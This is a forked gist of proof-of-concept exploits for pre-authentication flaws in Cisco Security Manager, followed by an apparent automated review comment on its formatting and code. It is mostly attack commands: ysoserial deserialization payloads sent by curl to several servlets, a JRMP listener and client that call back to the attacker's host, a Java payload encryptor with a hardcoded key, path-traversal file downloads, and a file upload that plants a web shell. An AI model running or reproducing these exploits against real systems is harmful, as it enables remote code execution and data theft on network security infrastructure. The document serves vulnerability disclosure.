@pnigos
Forked from Frycos/CSM_pocs.md
Created November 17, 2020 14:05

Revisions

  1. @Frycos Frycos created this gist Nov 16, 2020.
    159 changes: 159 additions & 0 deletions CSM_pocs.md
    @@ -0,0 +1,159 @@
    # TLDR

    > Cisco Security Manager is an enterprise-class security management application that provides insight into
    and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security
    management (configuration and event management) across a wide range of Cisco security appliances,
    including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs),
    Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more.
    Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.

    Several **pre-auth vulnerabilities** were submitted to Cisco on 2020-07-13 and (according to Cisco) **patched in version 4.22** on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of **NT AUTHORITY\SYSTEM**.

    Requirement: Download *commons-beanutils-1.6.1.jar* from central maven repository.

    # Remote Code Execution SecretService.jsp :-)

    `
    java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils
    `

    `
    curl -k --request POST --data-binary "@payload_CommonsBeanutils" https://[TARGET_HOST]/CSCOnm/servlet/SecretService.jsp
    `

    # Remote Code Execution CsJaasServiceServlet

    Compile JaasEncryptor.java and replace the *b64Payload* content:

    ```
    import java.security.InvalidKeyException;
    import java.util.Base64;
    import com.cisco.nm.cmf.security.jaas.BlobCrypt;
    public class JaasEncryptor {
    public static void main(String args[]) {
    String b64Payload = "rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3MQAKVW5pY2FzdFJlZgAIMTAuMC4wLjIAAAG7AAAAAEBnvkQAAAAAAAAAAAAAAAAAAAB4";
    byte[] payload = Base64.getDecoder().decode(b64Payload);
    byte[] key = new byte[]{-100, 76, -23, 87, 125, 0, 5, 94, 12, 76, 37, -84, 36, 78, 123, 5};
    byte[] enc = BlobCrypt.encryptArray(payload, key);
    System.out.println("Encrypted payload: " + Base64.getEncoder().encodeToString(enc));
    byte[] dec = BlobCrypt.decryptArray(enc, key);
    }
    }
    ```

    Prepare JRMP Listener:

    `
    java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 443
    `

    `
    java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]]:443' | base64 -w0
    `

    Compile encrypted payload:

    `
    javac -cp [YOUR_PATH]]/server_jars_classes/jars.jar:./ JaasEncryptor2.java; java -cp [YOUR_PATH]/server_jars_classes/jars.jar:./ JaasEncryptor
    `

    Send payload to Servlet with parameters *cmd=data* + new line + *data=[ENCRYPTED_PAYLOAD]*.

    # Remote Code Execution AuthTokenServlet

    Prepare JRMP Listener:

    `
    java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"
    `

    `
    java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]]:1337' > payload_JRMP1_2
    `

    Send request:

    `
    curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.AuthTokenServlet
    `

    # Remote Code Execution ClientServicesServlet

    Prepare JRMP listener:

    `
    java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"
    `

    `
    java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_3
    `

    Send request:

    `
    curl -k --request POST --data-binary "@payload_JRMP1_3" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.ClientServicesServlet
    `

    # Remote Code Execution CTMServlet

    `
    java -cp ./commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.GeneratePayload CommonsBeanutils1 "cmd.exe /c calc.exe" > payload_CommonsBeanutils1_2
    `

    `
    curl -i -s -k -X $'POST' -H $'Content-Type: application/octet-stream' -H $'CTM-URN: com-cisco-nm-vms-ipintel-IpIntelligenceApi' -H $'CTM-VERSION: 1.5' -H $'CTM-PRODUCT-ID: /C:/Program Files (x86)/CSCOpx/MDC/tomcat/vms/athena/WEB-INF/lib/' -H $'Cache-Control: no-cache' -H $'Pragma: no-cache' -H $'User-Agent: Java/1.8.0_222' -H $'Host: [TARGET_IP]' -H $'Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' -H $'Connection: keep-alive' --data-binary "@payload_CommonsBeanutils1_2" $'https://[TARGET_IP]/athena/CTMServlet'
    `

    # Arbitrary File Download XdmConfigRequestHandler

    `
    GET /athena/xdmProxy/xdmConfig[RELATIVE_PATH_TO_FILE]
    `

    # Arbitrary File Download XdmResourceRequestHandler

    `
    GET /athena/xdmProxy/xdmResources[RELATIVE_PATH_TO_FILE]?dmTargetType=TARGET.IDS&dmOsVersion=7.&command=editConfigDelta
    `

    # Arbitrary File Upload XmpFileUploadServlet

    Write a web shell e.g.

    `
    POST /cwhp/XmpFileUploadServlet?maxFileSize=100
    `

    Normal multi-part e.g. writing web shell in *filename* with *../../MDC/tomcat/webapps/cwhp/testme.jsp*.

    # Arbitrary File Download XmpFileDownloadServlet

    `GET /cwhp/XmpFileDownloadServlet?parameterName=downloadDoc&downloadDirectory=[RELATIVE_PATH_TO_DIRECTORY]&readmeText=1`

    This will respond with a ZIP file containing all files from the directory.

    # Arbitrary File Download SampleFileDownloadServlet

    `GET /cwhp/SampleFileDownloadServlet?downloadZipFileName=pwned&downloadFiles=README&downloadLocation=[RELATIVE_PATH_TO_DIRECTORY]`

    This will respond with a ZIP file containing all files from the directory.


    # Arbitrary File Download resultsFrame.jsp

    `GET /athena/itf/resultsFrame.jsp?filename=[RELATIVE_PATH_TO_FILE]`

    # Remote Code Execution SecretServiceServlet

    See also https://de.tenable.com/security/research/tra-2017-23

    `java -cp [YOUR_PATH]/commons-beanutils-1.6.1.jar:[YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1337 CommonsBeanutils1 "cmd.exe /c calc.exe"`

    `java -jar [YOUR_PATH]/ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient '[YOUR_IP]:1337' > payload_JRMP1_2`

    `curl -k --request POST --data-binary "@payload_JRMP1_2" https://[TARGET_IP]/CSCOnm/servlet/com.cisco.nm.cmf.servlet.SecretServiceServlet`
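Review bot: Several of the command blocks will not render as code in Markdown, because a single backtick on its own line does not open a fenced block; the `java ... > payload_CommonsBeanutils` and `curl ...` commands under "Remote Code Execution SecretService.jsp" (and the same pattern in the CsJaasServiceServlet, AuthTokenServlet, ClientServicesServlet and CTMServlet sections) should use triple-backtick fences like the JaasEncryptor listing already does. Within those commands the placeholders are inconsistent: `[YOUR_PATH]]` and `[YOUR_IP]]` carry a stray closing bracket in the SecretService.jsp, CsJaasServiceServlet, AuthTokenServlet and "Compile encrypted payload" lines, while the later sections use `[YOUR_PATH]` and `[YOUR_IP]`; one form should be used throughout so copy-paste does not break the classpath or the `host:port` argument. In the CsJaasServiceServlet section the compile line names `JaasEncryptor2.java`, but the listed source declares `public class JaasEncryptor`, so `javac` would reject the file name or the `java JaasEncryptor` invocation would fail to find the class; the file should be `JaasEncryptor.java`. In that same listing `byte[] dec = BlobCrypt.decryptArray(enc, key);` is assigned and never used (presumably a round-trip check), so it should either be asserted against `payload` or dropped; the listing also imports `InvalidKeyException` without using it. In the TLDR, "All payload are processed" should read "All payloads are processed", and since the text states that no advisory was published and only gives "patched in version 4.22", defenders have no advisory or CVE reference to track; if identifiers exist they should be added, otherwise the affected and fixed versions should be stated explicitly rather than only the fixed one.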